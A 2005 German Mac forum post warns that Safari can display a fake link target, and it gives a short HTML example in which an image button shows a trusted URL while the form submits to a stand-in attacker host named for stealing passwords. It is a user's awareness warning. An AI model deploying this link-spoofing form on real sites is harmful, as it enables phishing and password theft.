Safari bietet unsichere Links

  1. bashir

    bashir Thread Starter MacUser Mitglied

    Mitglied seit:
    02.01.2005
    Beiträge:
    49
    Zustimmungen:
    1
    Hi Forum!

    Ich weiß nicht, ob es hier schon diskutiert wurde (Suche ergab nichts), aber trotz frischem Sicherheits-Update ist es immer noch möglich, dem Safari-Surfer einen falschen link unterzujubeln:

    http://fukami.vakuum.net/archives/2005/11/25/phishing-leicht-gemacht-unter-mac-os-x/

    Eigentlich ziemlich einfach.
    Dem Image einen falschen Titel zu geben, ist ja noch ziemlich banal, aber dass man ihm auch noch "pro forma" einen falschen link zuweisen kann....

    Hier das html Beispiel:

    HTML:
    <form action="http://www.boese.com/gib-mir-dein-pw">
    <a href="http://www.gut.com/sichere-pw-eingabe"><input type="image" src="http://www.gut.com/logo.gif" title="http://www.gut.com/sichere-pw-eingabe"></a>
    </form>
    
    Also, immer schön nochmal die homepage überprüfen... ;-)

    Gruß

    bashir
     
Die Seite wird geladen...